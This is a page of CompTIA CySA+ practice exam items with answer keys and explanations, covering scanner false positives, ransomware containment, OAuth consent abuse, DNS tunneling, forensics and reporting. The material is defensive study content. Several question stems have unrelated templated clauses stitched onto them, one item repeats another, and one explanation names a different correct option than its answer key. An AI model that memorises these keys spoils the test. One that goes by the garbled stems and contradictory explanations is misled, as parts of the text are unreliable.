Your organization has deployed a new web application on a Linux server. The application uses a custom database port (TCP 3307). During a routine vulnerability scan, the scanner reports a critical vulnerability: 'MySQL Server - Unrestricted File Upload (CVE-20XX-XXXX)'. The system administrator confirms that MySQL is not installed; the custom database uses PostgreSQL on port 3307. The scanner likely misidentified the service due to port-based fingerprinting. On further investigation, you find that the scanner's fingerprinting database has an incorrect mapping for port 3307. The PostgreSQL version is current and fully patched. The environment is production and cannot be disrupted. Which of the following is the BEST action to take?

A.Manually update the scanner's database to correct the port mapping.
B.Schedule an immediate patch of the supposed MySQL vulnerability.
C.Apply a workaround to block file upload functionality on port 3307.
D.Mark the vulnerability as a false positive and suppress it for this asset.
AnswerD

Accurately identifies the issue and prevents future alerts.

Why this answer

Option D is correct because the vulnerability report is based on a false positive: the scanner misidentified the service on port 3307 as MySQL due to an incorrect port mapping in its fingerprinting database, while the actual service is a fully patched PostgreSQL. Since MySQL is not installed and no actual vulnerability exists, marking the finding as a false positive and suppressing it for this asset is the appropriate response in a production environment that cannot be disrupted.

Exam trap

CompTIA often tests the candidate's ability to distinguish between a true vulnerability and a false positive caused by service misidentification, trapping those who jump to patching or blocking without verifying the actual service running on the port.

How to eliminate wrong answers

Option A is wrong because manually updating the scanner's database is not a standard or recommended remediation action; scanner databases are vendor-managed, and manual edits could cause further inaccuracies or be overwritten on the next update. Option B is wrong because scheduling an immediate patch for a supposed MySQL vulnerability is unnecessary and potentially disruptive, as MySQL is not installed and the PostgreSQL service is fully patched—applying a non-existent patch wastes resources and may introduce risk. Option C is wrong because applying a workaround to block file upload functionality on port 3307 is irrelevant; PostgreSQL does not have an unrestricted file upload vulnerability, and blocking functionality would disrupt legitimate database traffic without addressing the actual scanner misidentification.

564
MCQmedium

After containing a ransomware incident, the incident response team is conducting post-incident activities. Which action is MOST important to prevent a similar attack in the future?

A.Sharing IOCs with other organizations via a threat intelligence platform
B.Reimaging all affected systems
C.Performing a root cause analysis and implementing remediation
D.Updating the incident response plan
AnswerC

This directly addresses the cause of the incident.

Why this answer

Conducting a root cause analysis identifies the underlying vulnerability or weakness that allowed the attack, enabling targeted remediation.

565
MCQeasy

While supporting a hybrid workforce, a user reports approving an unexpected OAuth consent prompt for an app named 'Invoice Reader'. The app now has mailbox read permissions. What should the incident responder do first? During detection and analysis, which decision is most defensible? which evidence should guide the decision?

A.Ignore it if MFA is enabled
B.Delete all emails from the mailbox
C.Only reset the user's Windows password
D.Revoke the app grant, review mailbox access, and identify other users who consented
AnswerD

OAuth consent abuse can persist without password access; revoking grants and scoping exposure contains the incident. In detection and analysis, responders need action that reduces risk while preserving the investigation record.

Why this answer

Option D is correct because the immediate priority is to revoke the malicious OAuth grant to stop the attacker's access, then review the mailbox for any data exfiltration or abuse, and finally identify other users who may have consented to the same app to contain the incident. This follows the NIST SP 800-61 incident response process for detection and analysis, where the most defensible decision is to remove the attacker's foothold and assess the scope of compromise. Ignoring the issue or taking non-targeted actions like password resets or email deletion fails to address the root cause—the OAuth consent grant—which persists independently of user credentials.

Exam trap

CompTIA often tests the misconception that resetting a user's password or enforcing MFA is sufficient to revoke OAuth tokens, when in reality the refresh token persists independently and must be explicitly revoked via the identity provider's admin interface.

How to eliminate wrong answers

Option A is wrong because MFA does not protect against OAuth consent phishing; the attacker obtains a refresh token via the consent grant, which bypasses MFA entirely. Option B is wrong because deleting all emails destroys forensic evidence and does not revoke the attacker's persistent access via the OAuth token. Option C is wrong because resetting the Windows password does not invalidate the OAuth refresh token stored in Azure AD/Entra ID; the app retains mailbox access until the grant is explicitly revoked.

566
MCQhard

A development team wants to find vulnerable open-source libraries before deployment. Which control best fits this stage? For control selection, Which control best addresses the stated weakness without hiding risk?

A.Wireless spectrum analysis
B.Physical badge access reviews
C.Database transaction log backups
D.Software composition analysis in the CI/CD pipeline
AnswerD

SCA identifies vulnerable third-party dependencies and can gate builds before release.

Why this answer

Software composition analysis (SCA) is the correct control because it automatically scans the project's dependencies against known vulnerability databases (e.g., NVD, GitHub Advisory Database) to identify vulnerable open-source libraries before deployment. Integrating SCA into the CI/CD pipeline ensures that vulnerabilities are caught early in the development lifecycle, aligning with the shift-left security principle without suppressing or masking risk.

Exam trap

CompTIA often tests the distinction between vulnerability scanning (SCA) and other security controls like network monitoring or physical security, so the trap here is confusing a general security practice (e.g., backups or access reviews) with a specific software dependency scanning control that directly addresses the stated weakness.

How to eliminate wrong answers

Option A is wrong because wireless spectrum analysis (e.g., using tools like Wireshark or spectrum analyzers) is used to detect rogue access points or interference in wireless networks, not to identify vulnerable open-source libraries in code. Option B is wrong because physical badge access reviews control physical access to facilities, not software dependencies or code-level vulnerabilities. Option C is wrong because database transaction log backups are a data recovery and integrity control, unrelated to scanning for vulnerable open-source libraries in a development pipeline.

567
MCQhard

A scanner flags TLS 1.0 on a server, but the service owner says TLS 1.0 is disabled. What is the BEST validation method? For tool configuration, Which scanner or pipeline change most directly improves result quality?

A.Change the severity to informational automatically
B.Delete the server from the scan scope
C.Close the finding because the owner disagrees
D.Manually test the service with a TLS client or scanner profile that negotiates protocol versions
AnswerD

Direct protocol validation determines whether TLS 1.0 is actually accepted.

Why this answer

Option D is correct because the most reliable way to validate whether TLS 1.0 is truly disabled is to perform an active, negotiated test using a TLS client (e.g., OpenSSL s_client) or a scanner profile that explicitly attempts to connect using only TLS 1.0. This bypasses any potential misconfiguration in the scanner's service detection or version negotiation logic, and directly confirms whether the server accepts a TLS 1.0 handshake. Relying solely on the scanner's banner grab or the owner's assertion can miss cases where the server still supports the protocol on certain ports or under specific cipher suites.

Exam trap

CompTIA often tests the concept that scanner results must be validated through active, protocol-specific testing rather than relying on configuration assertions or passive detection, and the trap here is assuming that a service owner's claim or a scanner's default detection is sufficient without manual verification.

How to eliminate wrong answers

Option A is wrong because changing severity to informational does not resolve the underlying validation issue; it merely hides the finding and could mask a real vulnerability if TLS 1.0 is actually enabled. Option B is wrong because deleting the server from the scan scope removes all future visibility into that asset, which is an overreaction and prevents ongoing security monitoring. Option C is wrong because closing a finding solely because the owner disagrees violates the principle of independent validation; the scanner's result must be verified through technical means, not dismissed based on opinion.

568
MCQmedium

During incident reconstruction, firewall events appear five minutes earlier than endpoint events for the same connection. What should the analyst check first? In the alert triage phase, Which action gives the analyst the clearest next triage step?

A.Prioritize only the source with the highest EPS
B.Time synchronization and timezone normalization across log sources
C.Assume the firewall logs are falsified
D.Delete one source from the timeline
AnswerB

Clock drift and timezone parsing commonly distort event order in SIEM timelines.

Why this answer

Time synchronization and timezone normalization across log sources is the correct first check because a consistent five-minute offset between firewall and endpoint events for the same connection strongly indicates a clock drift or timezone misconfiguration rather than a security anomaly. In incident reconstruction, analysts must ensure all timestamps are aligned to a common reference (e.g., UTC) and that NTP is properly configured on all devices; otherwise, the timeline is unreliable. This step directly addresses the root cause before any triage or prioritization can occur.

Exam trap

The CS0-003 exam often tests the misconception that a timestamp discrepancy automatically indicates log tampering or that high EPS should drive triage priority, when in fact the immediate technical root cause is almost always a time synchronization issue.

How to eliminate wrong answers

Option A is wrong because prioritizing only the source with the highest EPS (Events Per Second) ignores the fundamental time discrepancy and could lead to focusing on a noisy but irrelevant log source while the actual timing issue remains unresolved. Option C is wrong because assuming the firewall logs are falsified without first verifying time synchronization introduces bias and wastes investigative effort; log falsification is a serious claim that requires evidence, not a default assumption when a simple clock skew is the most likely explanation.

569
Multi-Selectmedium

A security analyst is evaluating a Kubernetes cluster for misconfigurations. Which TWO of the following are common Kubernetes misconfigurations that increase security risk? (Select the two best answers.)

Select 2 answers
A.Running containers as non-root user
B.Using hostPath mounts
C.Using privileged containers
D.Enabling Role-Based Access Control (RBAC)
E.Implementing network policies to restrict traffic
AnswersB, C

hostPath mounts allow container access to host filesystem.

Why this answer

Privileged containers and hostPath mounts are known high-risk misconfigurations in Kubernetes.

570
MCQmedium

A company uses a configuration management tool to enforce CIS Benchmarks on its servers. The security team wants to apply Level 1 benchmarks to all servers to achieve a baseline security posture. Which of the following best describes the difference between CIS Level 1 and Level 2 benchmarks?

A.Level 1 benchmarks are for Linux systems, while Level 2 benchmarks are for Windows systems.
B.Level 1 benchmarks are basic security measures that do not impact system performance, while Level 2 benchmarks are more restrictive and may affect performance or usability.
C.Level 1 benchmarks are for servers, while Level 2 benchmarks are for workstations.
D.Level 1 benchmarks are mandatory, while Level 2 benchmarks are optional.
AnswerB

This accurately describes the intended outcome.

Why this answer

CIS Level 1 benchmarks are intended to provide a clear security benefit without significantly impacting functionality or performance. Level 2 benchmarks provide more stringent security but may reduce functionality or require additional operational effort.

571
MCQmedium

During a traffic analysis, a security analyst observes repeated outbound connections from an internal workstation to an external IP address on TCP port 53 at irregular intervals. The connections are small and occur every few minutes. Which technique is most likely being used?

A.HTTP smuggling
B.TCP handshake anomaly
C.DNS tunneling
D.Beaconing
AnswerC

Using TCP port 53 for data exfiltration is characteristic of DNS tunneling.

Why this answer

DNS normally uses UDP, but TCP port 53 can be used for DNS tunneling. The small, irregular connections to a single external IP suggest data exfiltration via DNS tunneling.

572
MCQmedium

A CASB alert indicates that a user downloaded a file containing sensitive data from a cloud app to an unmanaged device. Which action should the analyst take first?

A.Report the incident to law enforcement
B.Reset the user's password
C.Block the user's cloud app access
D.Investigate the alert to confirm the data exfiltration
AnswerD

Confirmation is necessary before taking action.

Why this answer

The first step is to verify the alert is a true positive by checking the user's activity and the file's sensitivity. Prematurely blocking or reporting may be incorrect if the alert is a false positive.

573
MCQeasy

A security dashboard is being designed for the executive team. Which metric is MOST appropriate to display?

A.Current CPU utilization on firewalls
B.Overall risk posture score with trend over time
C.Patch installation status of all endpoints
D.Number of IDS alerts per hour
AnswerB

Provides a concise summary of security health.

Why this answer

The executive team requires a high-level, strategic view of security effectiveness, not granular operational data. The overall risk posture score with trend over time directly communicates the organization's security health and whether it is improving or deteriorating, enabling informed decision-making. This aligns with the Reporting and Communication domain's emphasis on translating technical metrics into business-relevant insights.

Exam trap

CompTIA often tests the distinction between operational metrics (for technical teams) and strategic metrics (for executives), and the trap here is that candidates mistake a detailed, operational metric like patch status or alert counts as appropriate for an executive dashboard, ignoring the need for aggregated, trended risk visibility.

How to eliminate wrong answers

Option A is wrong because current CPU utilization on firewalls is an operational metric relevant to network engineers for troubleshooting performance issues, not a strategic indicator for executives. Option C is wrong because patch installation status of all endpoints is a detailed, tactical metric that belongs in IT operations or vulnerability management dashboards, not an executive summary. Option D is wrong because the number of IDS alerts per hour is a raw, high-volume data point that lacks context and would overwhelm executives; it requires correlation and analysis to be meaningful.

574
MCQmedium

During a web application security assessment using OWASP ZAP, a tester identifies that the application reflects user input in HTTP responses without proper encoding. Which OWASP Top 10 vulnerability category does this finding most likely belong to?

A.Broken Access Control
B.Cryptographic Failures
C.Security Misconfiguration
D.Injection
AnswerD

XSS is a type of injection where untrusted data is included in output.

Why this answer

Reflected user input in responses without encoding is a classic sign of Cross-Site Scripting (XSS), which falls under injection in OWASP Top 10 (though XSS is specifically listed as a separate category in some versions, but in 2021 it is under injection).

575
Multi-Selectmedium

When briefing legal and privacy teams after a suspected data exposure, which details matter? (Choose two.)

Select 2 answers
A.Data types and jurisdictions potentially affected
B.A complete list of unrelated server patches
C.Speculation about attacker identity without evidence
D.Timeline of discovery, containment, and known access
AnswersA, D

Notification duties depend on data and jurisdiction.

Why this answer

Data types (e.g., PII, PHI, PCI) and affected jurisdictions determine legal notification obligations under regulations like GDPR, HIPAA, or CCPA. Jurisdictions dictate breach notification timelines and penalties, making this information critical for legal and privacy teams to assess risk and compliance. Without this detail, the response cannot be properly scoped or legally defensible.

Exam trap

The CS0-003 exam often tests the distinction between operational details (like patch lists) and legally relevant information (data types and jurisdictions), trapping candidates who think all technical details are equally important for legal teams.

576
MCQmedium

During a network traffic analysis, a security analyst observes repeated connections from an internal host to an external IP address on TCP port 53. The traffic volume is low but consistent. What type of anomaly is most likely indicated?

A.Data exfiltration via DNS tunneling
B.Lateral movement using SMB
C.Port scan activity from an internal host
D.Beaconing to a command-and-control server
AnswerA

DNS tunneling uses port 53 and is a common data exfiltration technique, consistent with the pattern observed.

Why this answer

DNS tunneling often uses port 53 to exfiltrate data by encoding it in DNS queries. The consistent low-volume traffic to a single external IP suggests covert communication.

577
Multi-Selecteasy

A security analyst is reviewing alerts from an IDS. Which TWO indicators are most likely to suggest a successful command and control (C2) communication? (Choose two.)

Select 2 answers
A.An inbound connection from a known malicious IP to the mail server
B.A high volume of outbound traffic to an unusual destination IP on port 443
C.A single large file upload to a cloud storage service
D.An internal host performing a DNS query for a known malicious domain
E.Regular beaconing activity to an external IP with consistent payload sizes
AnswersB, E

High volume outbound traffic to an unusual IP on 443 could be data exfiltration or C2 traffic masquerading as HTTPS.

Why this answer

B is correct because a high volume of outbound traffic to an unusual destination IP on port 443 (HTTPS) is a classic indicator of data exfiltration or C2 communication, as attackers often use encrypted channels to blend in with legitimate web traffic. The combination of high volume and an unusual destination IP suggests the host is sending data to an external server controlled by the attacker, which is a key sign of an active C2 session.

Exam trap

The CS0-003 exam often tests the distinction between attempted and successful C2 communication, where candidates mistakenly choose indicators like DNS queries or inbound connections as proof of success, but only outbound beaconing or sustained data transfer on unusual ports confirms an established C2 channel.

578
MCQmedium

An organization is implementing a patch management process for servers. Which of the following is a crucial step that should be performed before deploying patches to production servers?

A.Immediately apply the patch to all systems to minimize exposure
B.Review the CVSS score to decide if the patch is necessary
C.Verify patch compliance by checking the vendor's advisory
D.Test the patch in a staging environment that closely mirrors production
AnswerD

Testing ensures stability before production rollout.

Why this answer

Testing patches in a staging environment that mirrors production helps identify issues that could cause outages or incompatibilities.

579
MCQmedium

During a security incident involving a potential data breach, the CISO asks you to prepare a communication for the board of directors. What is the MOST important aspect to emphasize in this communication?

A.The specific malware used and its technical attributes
B.The names of the IT staff who first detected the incident
C.A step-by-step timeline of the incident response actions taken so far
D.The financial impact, reputational risk, and potential regulatory penalties
AnswerD

Correct. Business risk communication is key for executive audiences.

Why this answer

Board members are non-technical stakeholders who need to understand the business impact. The communication should translate technical details into financial, reputational, and regulatory consequences.

580
MCQhard

A development team wants to find vulnerable open-source libraries before deployment. Which control best fits this stage? For tool configuration, Which scanner or pipeline change most directly improves result quality?

A.Physical badge access reviews
B.Wireless spectrum analysis
C.Software composition analysis in the CI/CD pipeline
D.Database transaction log backups
AnswerC

SCA identifies vulnerable third-party dependencies and can gate builds before release.

Why this answer

Software composition analysis (SCA) is the correct control because it specifically scans open-source libraries for known vulnerabilities (CVEs) and license compliance issues. Integrating SCA into the CI/CD pipeline ensures that vulnerable dependencies are detected automatically before code is deployed, enabling early remediation without manual overhead.

Exam trap

The CS0-003 exam often tests the distinction between vulnerability scanning (SCA) and network or physical controls, expecting candidates to recognize that open-source library risks require a software-focused tool, not a hardware or access control solution.

How to eliminate wrong answers

Option A is wrong because physical badge access reviews control physical security, not software library vulnerabilities; they have no mechanism to inspect open-source code or its dependencies. Option B is wrong because wireless spectrum analysis monitors radio frequency interference and rogue access points, not software libraries; it addresses network-layer threats, not application-layer dependency risks.

581
Multi-Selecthard

During a forensic investigation, an analyst must preserve evidence in accordance with forensic sound procedures. Which THREE of the following practices should the analyst follow? (Select THREE.)

Select 3 answers
A.Run a full antivirus scan on the target drive
B.Document all actions taken in a chain of custody form
C.Use a write blocker when imaging a hard drive
D.Create a cryptographic hash of the original media before imaging
E.Boot the system to ensure it is operational
AnswersB, C, D

Chain of custody ensures evidence admissibility.

Why this answer

Forensic sound procedures include using write blockers to prevent alteration, verifying integrity with hashes, and documenting the chain of custody. Running a live scan would alter data.

582
MCQhard

A security analyst is performing dynamic malware analysis using a sandbox. The analyst observes that the malware creates a scheduled task that executes a PowerShell command to download a payload from a remote server. Which of the following behavioral IOCs should be prioritized for detection?

A.The domain name of the remote server
B.The hash of the initial malware sample
C.The IP address of the remote server
D.The creation of a scheduled task
AnswerD

Scheduled task creation is a persistent and observable behavior across many environments.

Why this answer

The scheduled task creation is a persistent mechanism that can be detected via monitoring for new scheduled tasks.

583
MCQeasy

A security analyst receives an alert about a possible ransomware outbreak. Which short-term containment action should be performed FIRST to prevent further spread?

A.Disable the user account
B.Rebuild the system
C.Update antivirus signatures
D.Isolate the system from the network
AnswerD

Network isolation stops lateral movement and C2 communication immediately.

Why this answer

Network isolation (disconnecting the affected system from the network) is a quick short-term containment step that stops the ransomware from communicating with C2 or spreading laterally.

584
MCQeasy

A company's IDS generated an alert for a SQL injection attempt against a web server. The web application firewall (WAF) is already in place. What is the best action?

A.Update the WAF rules
B.Block the source IP at the firewall
C.Shut down the web server
D.Verify if the attack succeeded by checking server logs
AnswerD

Determines if the WAF blocked the injection or if further action is needed.

Why this answer

Option B is correct because the first step is to verify whether the attack succeeded by checking the server logs. Premature blocking or shutdown may be unnecessary.

585
MCQmedium

A cloud posture scan finds a storage bucket with public read access containing customer exports. What should the team do first? For tool configuration, Which scanner or pipeline change most directly improves result quality?

A.Restrict public access and determine whether sensitive data was accessed
B.Wait for the next quarterly review
C.Rotate database administrator passwords only
D.Delete all audit logs to reduce liability
AnswerA

The priority is exposure containment and impact assessment.

Why this answer

Option A is correct because the immediate priority is to stop the data leak by restricting public read access to the storage bucket, then investigate whether sensitive data was actually accessed. This aligns with the incident response principle of containment before analysis. In cloud environments like AWS S3 or Azure Blob Storage, a bucket with public read access exposes all objects to the internet, and the first step is to apply a bucket policy or ACL to deny public access.

Exam trap

The CS0-003 exam often tests the misconception that rotating credentials (like database passwords) is a catch-all fix for data exposure, but the trap here is that the vulnerability is a misconfigured storage bucket, not compromised credentials, so the correct first step is to restrict public access and assess exposure.

How to eliminate wrong answers

Option B is wrong because waiting for the next quarterly review leaves sensitive customer data exposed to the internet for an extended period, violating data protection regulations and incident response best practices. Option C is wrong because rotating database administrator passwords does not address the root cause—a misconfigured storage bucket with public read access—and is an irrelevant action for this specific vulnerability.

586
Multi-Selectmedium

Which evidence helps distinguish a true brute-force attack from a misconfigured service account? (Choose two.)

Select 2 answers
A.The number of monitors used by the administrator
B.Source distribution and timing of failed logons
C.Whether one service account repeatedly fails after a password change
D.The brand of the office router only
AnswersB, C

Distributed or patterned failures suggest attack activity.

Why this answer

Option B is correct because a true brute-force attack typically originates from multiple source IP addresses or a single source with a high frequency of failed logons over a short time window, whereas a misconfigured service account usually fails from a consistent source at regular intervals. Analyzing the source distribution and timing of failed logons helps distinguish automated attack patterns from predictable service account behavior, such as retry intervals defined in application configuration.

Exam trap

The CS0-003 exam often tests the misconception that any repeated failed logon after a password change is evidence of an attack, when in fact it is a classic symptom of a misconfigured service account that has not been updated with the new credentials.

587
Multi-Selectmedium

Which three metrics are commonly used to measure the effectiveness of a security operations center (SOC)? (Select THREE.)

Select 3 answers
A.Number of firewall rules
B.Number of employees in the SOC
C.Mean Time to Respond (MTTR)
D.Mean Time to Remediate (MTTRem)
E.Mean Time to Detect (MTTD)
AnswersC, D, E

Measures response time.

Why this answer

MTTD, MTTR, and MTTRem are standard SOC metrics to measure detection and response effectiveness.

588
Multi-Selecthard

Which TWO of the following are indicators of potential data exfiltration via DNS?

Select 2 answers
A.Unusual TLS handshake patterns
B.Traffic to known malicious IPs over HTTP
C.Large number of NXDOMAIN responses
D.High volume of TXT record queries
E.Frequent queries to long subdomains
AnswersD, E

TXT records are commonly used to encode exfiltrated data.

Why this answer

Option D is correct because TXT records are commonly used in DNS tunneling to encode exfiltrated data. Attackers embed data in TXT record queries or responses, and a high volume of such queries is a strong indicator of data exfiltration via DNS.

Exam trap

CompTIA often tests the distinction between DNS tunneling indicators (TXT record volume and long subdomains) and other DNS anomalies like NXDOMAIN responses, which are more associated with DGA or reconnaissance rather than exfiltration.

589
Multi-Selectmedium

An analyst is creating a Sigma rule to detect suspicious use of rundll32.exe to execute DLL files from temporary directories. Which TWO fields should the analyst include in the rule to minimize false positives?

Select 2 answers
A.File Size: > 1 MB
B.Parent Process: explorer.exe
C.Process Name: rundll32.exe
D.Image Path: C:\Windows\System32\rundll32.exe
E.Command Line: contains *\Temp\*.dll
AnswersC, E

Targeting rundll32.exe reduces false positives from other processes.

Why this answer

To avoid false positives, the rule should specify the process name (rundll32.exe) and the command-line argument containing a path to a temp directory, as legitimate uses rarely involve DLLs from temp folders.

590
MCQeasy

In a regulated payment environment, an incident was contained successfully, but delayed escalation allowed the attacker more dwell time. What should the post-incident review produce? During eradication, which decision is most defensible? which action best reduces risk without losing evidence?

A.A generic statement that security is important
B.Deletion of all incident tickets
C.A blame list of individual analysts
D.Specific playbook updates, escalation triggers, owners, and due dates
AnswerD

Lessons learned should translate findings into trackable process improvements. In eradication, responders need action that reduces risk while preserving the investigation record.

Why this answer

Option D is correct because a post-incident review in a regulated payment environment must produce actionable improvements to prevent recurrence. Delayed escalation indicates a failure in detection or notification procedures, so the review should yield specific playbook updates, escalation triggers, assigned owners, and due dates to ensure timely response in future incidents. This aligns with NIST SP 800-61r2 and PCI DSS requirements for continuous improvement of incident response processes.

Exam trap

The CS0-003 exam often tests the misconception that post-incident reviews are about assigning blame or deleting evidence, rather than focusing on process improvement and evidence preservation.

How to eliminate wrong answers

Option A is wrong because a generic statement that security is important provides no measurable, actionable steps to fix the identified procedural gap, and would fail audit scrutiny in a regulated environment. Option B is wrong because deletion of all incident tickets violates evidence preservation requirements under regulations like PCI DSS and GDPR, and destroys the forensic trail needed for root cause analysis and legal proceedings. Option C is wrong because a blame list of individual analysts creates a punitive culture that discourages reporting and collaboration, and does not address the systemic process failure that allowed delayed escalation.

591
MCQmedium

During the detection and analysis phase of incident response, a security analyst identifies suspicious outbound traffic from a finance workstation to a known malicious IP address at 2:00 AM. The analyst checks the firewall logs and sees a single connection. Which action should the analyst take FIRST according to NIST SP 800-61?

A.Validate the incident by reviewing additional data sources.
B.Run a full antivirus scan on the workstation.
C.Isolate the workstation from the network immediately.
D.Notify law enforcement per the incident response plan.
AnswerA

Validation ensures the alert is a true incident, reducing false positives.

Why this answer

NIST SP 800-61 emphasizes that during detection and analysis, the first step is to validate the incident as a true positive before escalating or containing. The analyst should confirm the alert is not a false positive by gathering additional evidence.

592
MCQhard

An organization's compliance dashboard shows a control effectiveness score of 85%. Which type of evidence best supports this score?

A.Incident response logs
B.Employee training records
C.Vendor documentation
D.Penetration test results and audit reports
AnswerD

These provide objective evidence of control performance.

Why this answer

Control effectiveness evidence, such as penetration test results and audit reports, directly demonstrates how well controls are working.

593
Multi-Selectmedium

During containment of a compromised cloud access key, which actions are appropriate? (Choose two.)

Select 2 answers
A.Review audit logs for actions performed with the key
B.Only delete the public repository commit
C.Grant the key administrator privileges for investigation
D.Disable or rotate the exposed key
AnswersA, D

Audit review establishes scope and impact.

Why this answer

Reviewing audit logs for actions performed with the compromised key is appropriate during containment because it allows the incident response team to determine the scope of unauthorized access, identify affected resources, and understand the attacker's actions. This step is critical for informed decision-making before revoking or rotating the key, ensuring that legitimate operations are not disrupted and that forensic evidence is preserved.

Exam trap

The CS0-003 exam often tests the misconception that immediate revocation or deletion of the key is the only containment step, but the correct approach requires first auditing the key's usage to understand the full impact before taking irreversible actions.

594
MCQmedium

A security analyst receives an alert from the HIDS indicating that a critical configuration file was modified unexpectedly. What is the best immediate action?

A.Ignore the alert as HIDS false positives are common
B.Immediately revert the file and block any similar changes
C.Check the change management system to see if the change was approved
D.Restore the file from a known good backup
AnswerC

Determines if modification is legitimate.

Why this answer

Option C is correct because the best immediate action when a HIDS alerts on a critical configuration file change is to first verify whether the change was authorized through the change management system. This aligns with the incident response process of validation before remediation; reverting or restoring without checking could disrupt approved maintenance or patch deployments. HIDS monitors file integrity via checksums (e.g., SHA-256), but it cannot distinguish approved changes from malicious ones without external context.

Exam trap

The CS0-003 exam often tests the principle that immediate remediation (reverting or restoring) is not the best first step; candidates mistakenly jump to containment actions without validating whether the change was authorized, confusing incident response speed with due diligence.

How to eliminate wrong answers

Option A is wrong because ignoring HIDS alerts on critical configuration files is negligent; while false positives can occur, dismissing them without investigation violates security operations best practices and could allow a breach to go undetected. Option B is wrong because immediately reverting the file and blocking changes is premature and could undo an authorized change (e.g., a scheduled security patch or configuration update), potentially causing service disruption or compliance issues. Option D is wrong because restoring from a known good backup is a remediation step that should only be taken after confirming the change was unauthorized; doing so without checking change management could overwrite legitimate modifications and lose audit trail data.

595
Multi-Selectmedium

During a cloud security investigation, a security analyst notices unusual API calls from a compromised IAM user in AWS. The analyst wants to determine the scope of the breach and identify affected resources. Which TWO cloud-native services should the analyst use?

Select 2 answers
A.AWS Shield
B.AWS CloudTrail
C.AWS WAF
D.AWS Config
E.Amazon GuardDuty
AnswersB, E

CloudTrail logs all API calls and is essential for auditing user activity.

Why this answer

AWS CloudTrail records API activity, and GuardDuty provides threat detection. Both are native services for investigation.

596
MCQmedium

A business unit accepts the risk of delaying a patch because downtime would breach a contractual deadline. What should be updated? For validation, Which action should be taken before closing or downgrading the finding?

A.The risk register with owner, justification, expiry date, and compensating controls
B.The firewall vendor invoice
C.The incident containment playbook only
D.The phishing training completion list
AnswerA

Risk acceptance must be explicit, time-bound, owned, and controlled.

Why this answer

When a business unit formally accepts the risk of delaying a patch due to contractual constraints, the risk must be documented in the risk register. This entry should include the owner, justification, expiry date, and compensating controls to ensure the risk is tracked, reviewed, and eventually remediated. This aligns with the vulnerability management lifecycle, where accepted risks require formal documentation and periodic reassessment.

Exam trap

The CS0-003 exam often tests the distinction between risk acceptance documentation (risk register) and operational documents (playbooks, invoices), tricking candidates into thinking any update related to the delay is sufficient, when only the risk register captures the formal acceptance process.

How to eliminate wrong answers

Option B is wrong because the firewall vendor invoice is a financial document unrelated to risk acceptance or vulnerability management; it does not track risk decisions or compensating controls. Option C is wrong because the incident containment playbook is designed for active incident response, not for documenting accepted risks from delayed patching; updating it would not address the need to formally record the risk acceptance.

597
MCQhard

A cloud security team is using a container image scanning tool and finds a vulnerability in a base image used by many containers. The vulnerability is rated CVSS 7.5 and has a high EPSS score. However, rebuilding all containers with a patched base image will take significant time. What is the best immediate action?

A.Wait for the next scheduled rebuild cycle to patch the base image.
B.Apply a hotfix or workaround to the affected package in running containers.
C.Increase network segmentation to limit exposure from the vulnerability.
D.Remove all containers using the vulnerable base image immediately.
AnswerB

Provides immediate protection while planning full rebuild.

Why this answer

With high exploitability (EPSS), immediate action is needed. Applying a hotfix or workaround, such as updating the affected package in running containers, reduces risk while a full rebuild is planned.

598
MCQeasy

A security analyst is reviewing a SIEM alert that triggered on a single failed login attempt from an internal IP address to a domain controller at 3:00 AM. The user associated with the account is on vacation. Which classification best describes this alert?

A.False positive
B.False negative
C.True negative
D.True positive
AnswerD

The alert correctly identified a real security event.

Why this answer

The alert is triggered by a real failed login attempt from an internal IP, but the user is on vacation, so it likely indicates a malicious attempt. Since it is a confirmed security incident, it is a true positive.

599
MCQhard

During a threat hunting exercise, an analyst formulates a hypothesis that an attacker may be using DNS tunneling to exfiltrate data. Which data source would provide the best evidence to confirm or deny this hypothesis?

A.Firewall logs showing allowed outbound connections
B.NetFlow records from the border router
C.EndPoint detection and response (EDR) logs showing DNS client activity
D.Deep packet inspection (DPI) of DNS traffic
AnswerD

DPI reveals content of DNS packets which can indicate tunneling.

Why this answer

Deep packet inspection (DPI) of DNS traffic is the best evidence because DNS tunneling works by encoding data within DNS queries and responses, often using non-standard record types (e.g., TXT, NULL) or unusually long domain names. DPI can decode the payload within DNS packets to reveal hidden data, whereas other methods only see metadata or connection summaries. This allows the analyst to directly inspect the content of DNS messages for signs of exfiltration, such as base64-encoded data or anomalous query patterns.

Exam trap

The CS0-003 exam often tests the misconception that NetFlow or firewall logs are sufficient for detecting data exfiltration, when in reality only deep packet inspection can reveal the payload content necessary to confirm DNS tunneling.

How to eliminate wrong answers

Option A is wrong because firewall logs showing allowed outbound connections only indicate that traffic passed through the firewall, not the content or structure of DNS packets; they cannot reveal whether data is being tunneled within DNS. Option B is wrong because NetFlow records from the border router provide metadata such as source/destination IPs, ports, and byte counts, but they lack the payload-level detail needed to detect encoded data inside DNS queries or responses. Option C is wrong because EDR logs showing DNS client activity typically record process-level events (e.g., which process made a DNS query) but do not capture the full DNS packet payload, making them insufficient to identify tunneling without additional deep inspection.

600
MCQmedium

A security analyst is triaging an alert indicating that a user's workstation has been infected with ransomware. The file server shows signs of encryption. The analyst needs to contain the incident. Which action should the analyst take FIRST to minimize damage?

A.Running a full antivirus scan on the workstation
B.Disabling the user's Active Directory account
C.Rebuilding the workstation from a known good image
D.Disconnecting the workstation from the network
AnswerD

This is a short-term containment action that isolates the compromised system.

Why this answer

Disconnecting the infected workstation from the network stops the ransomware from spreading to other systems via network shares.

Page 7

Page 8 of 14

Page 9